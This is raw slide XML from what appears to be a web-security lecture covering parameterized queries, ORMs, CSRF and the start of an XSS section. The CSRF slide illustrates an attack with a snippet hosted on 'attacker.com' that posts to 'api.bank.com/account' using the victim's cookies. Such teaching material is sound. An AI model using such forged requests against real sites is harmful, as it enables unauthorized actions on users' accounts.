            <a:pPr marL="0" indent="0" defTabSz="800735">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4656"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Benefit 2: P</a:t>
            </a:r>
            <a:r>
              <a:t>arameterized queries are </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" u="sng"/>
              <a:t>faster</a:t>
            </a:r>
            <a:r>
              <a:t> because server caches query plan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="14361299" y="6427661"/>
            <a:ext cx="3571510" cy="869187"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:schemeClr val="accent3">
                <a:hueOff val="914337"/>
                <a:satOff val="31515"/>
                <a:lumOff val="-30790"/>
              </a:schemeClr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07" name="Values are sent to server  separately from command.  Library doesn’t need to escape"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18490654" y="5357677"/>
            <a:ext cx="6291854" cy="16138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b="0" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="914337"/>
                    <a:satOff val="31515"/>
                    <a:lumOff val="-30790"/>
                  </a:schemeClr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pPr>
            <a:r>
              <a:t>Values are sent to server </a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>separately from command. </a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>Library doesn’t need to escape</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="16527876" y="5444980"/>
            <a:ext cx="1363115" cy="464665"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:schemeClr val="accent3">
                <a:hueOff val="914337"/>
                <a:satOff val="31515"/>
                <a:lumOff val="-30790"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a: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Object Relational Mapper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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Object Relational Mappers </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Object Relational Mappers (ORM) provide an interface between native objects and relational databases.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="8590869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="800735">
              <a:spcBef>
                <a:spcPts val="5700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4656"/>
            </a:pPr>
            <a:r>
              <a:t>Object Relational Mappers (ORM) provide an interface between native objects and relational databases. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="800735">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2910"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="443484">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1164">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="443484">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3880">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0433FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:t>(DBObject):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="443484">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1940">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="443484">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3880">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    __id__ </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t> Column(Integer, primary_key</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>True</a:t>
            </a:r>
            <a:r>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="443484">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3880">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    name   </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t> Column(String(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>255</a:t>
            </a:r>
            <a:r>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="443484">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3880">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    email  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t> Column(String(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>255</a:t>
            </a:r>
            <a:r>
              <a:t>), unique</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>True</a:t>
            </a:r>
            <a:r>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="443484">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3880">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="443484">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3880">
                <a:solidFill>
                  <a:srgbClr val="C8352B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rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="22288F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__name__</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>"__main__"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="443484">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3880">
                <a:solidFill>
                  <a:srgbClr val="C8352B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rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    users </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> User</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>query(</a:t>
            </a:r>
            <a:r>
              <a:t>email='kaikai@hkust.edu'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>).all()</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="443484">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3880">
                <a:solidFill>
                  <a:srgbClr val="C8352B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rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    session</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>add(User(email</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>'dongdong@hkust.edu'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, name</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>‘Dongdong'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="443484">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3880">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    session</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:t>commit()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Cross-Site Request Forgery (CSRF)"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="345634"/>
            <a:ext cx="21005800" cy="2286001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="759459">
              <a:defRPr sz="1196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/>
            <a:r>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1720850" y="3006975"/>
            <a:ext cx="20942300" cy="3024001"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4935"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:hueOff val="-82419"/>
                <a:satOff val="-9513"/>
                <a:lumOff val="-16343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26" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11837279" y="4227600"/>
            <a:ext cx="6536907" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:defRPr b="0" sz="40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127" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2140541" y="3388675"/>
            <a:ext cx="9136119" cy="2260601"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8688"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="50800" dist="25400" dir="3600000">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:defRPr b="0" sz="40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128" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2178592" y="3411735"/>
            <a:ext cx="9060018" cy="10305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lnTo>
                  <a:pt x="0" y="4117"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2980"/>
                  <a:pt x="52" y="1951"/>
                  <a:pt x="136" y="1206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="461"/>
                  <a:pt x="336" y="0"/>
                  <a:pt x="464" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21136" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21264" y="0"/>
                  <a:pt x="21380" y="461"/>
                  <a:pt x="21464" y="1206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21548" y="1951"/>
                  <a:pt x="21600" y="2980"/>
                  <a:pt x="21600" y="4117"/>
                </a:cubicBez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DCDEE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b="0" sz="39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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="132" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2325175" y="3842380"/>
            <a:ext cx="851441" cy="165758"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="851439" cy="165757"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="129" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="681174" y="0"/>
              <a:ext cx="170266" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00882B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b="0" sz="4000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="130" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="340587" y="0"/>
              <a:ext cx="170266" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F5D32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b="0" sz="4000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="131" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="170266" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C82506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b="0" sz="4000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3449884" y="3667176"/>
            <a:ext cx="7448787" cy="516165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b="0" sz="40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pic>
        <p:nvPicPr>
          <p:cNvPr id="134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433529" y="3757284"/>
            <a:ext cx="382141" cy="335949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13962448" y="5120004"/>
            <a:ext cx="4572739" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:defRPr b="0" sz="40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pic>
        <p:nvPicPr>
          <p:cNvPr id="136" name="web_server.tiff" descr="web_server.tiff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20277574" y="3340095"/>
            <a:ext cx="1059222" cy="1267012"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="POST /transfer"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11873080" y="3604614"/>
            <a:ext cx="3315222" cy="5904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lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:defRPr b="0">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:t> /transfer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="api.bank.com"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19522833" y="4974989"/>
            <a:ext cx="2568703" cy="5604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api.bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="139" name="0484184d72076b38f8b68869d565ab1b-chocolate-chip-cookie-icon-by-vexels.png" descr="0484184d72076b38f8b68869d565ab1b-chocolate-chip-cookie-icon-by-vexels.png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6498848" y="3594776"/>
            <a:ext cx="516165" cy="516165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="attacker.com"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3453324" y="3645034"/>
            <a:ext cx="2491741" cy="5604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attacker.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="$.post({url: “api.bank.com/account“, …})"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2505495" y="4699094"/>
            <a:ext cx="8345241" cy="508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defRPr b="0" sz="2700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:t>({url: “api.bank.com/account“, …})</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="142" name="0484184d72076b38f8b68869d565ab1b-chocolate-chip-cookie-icon-by-vexels.png" descr="0484184d72076b38f8b68869d565ab1b-chocolate-chip-cookie-icon-by-vexels.png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7081261" y="3594776"/>
            <a:ext cx="516164" cy="516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143" name="51xnaPe5YuL._SL1000_.jpg" descr="51xnaPe5YuL._SL1000_.jpg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12421631" y="4529809"/>
            <a:ext cx="1180391" cy="1180390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Cross-site request forgery (CSRF) attacks are a type of web exploit where a website transmits unauthorized commands as a user that the web app trusts…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1785697" y="6816188"/>
            <a:ext cx="20812606" cy="3677154"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Cross-site request forgery (CSRF) attacks are a type of web exploit where a website transmits unauthorized commands as a </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:t> that the web app trusts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>In a CSRF attack, a user is tricked into submitting an unintended </a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>(often unrealized) web request to a website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chemeClr val="accent5">
            <a:lumOff val="-29866"/>
          </a:scheme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Cross Site Scripting…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726440">
              <a:defRPr sz="14960">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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pPr>
            <a:r>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="726440">
              <a:defRPr sz="14960">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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pPr>
            <a:r>
              <a:t>(XSS)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Cross Site Scripting (XSS)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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="Cross Site Scripting: Attack occurs when application takes untrusted data and sends it to a web browser without proper validation or sanitization."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="251381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600"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1"/>
            </a:pPr>
            <a:r>
              <a:t>Cross Site Scripting: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0"/>
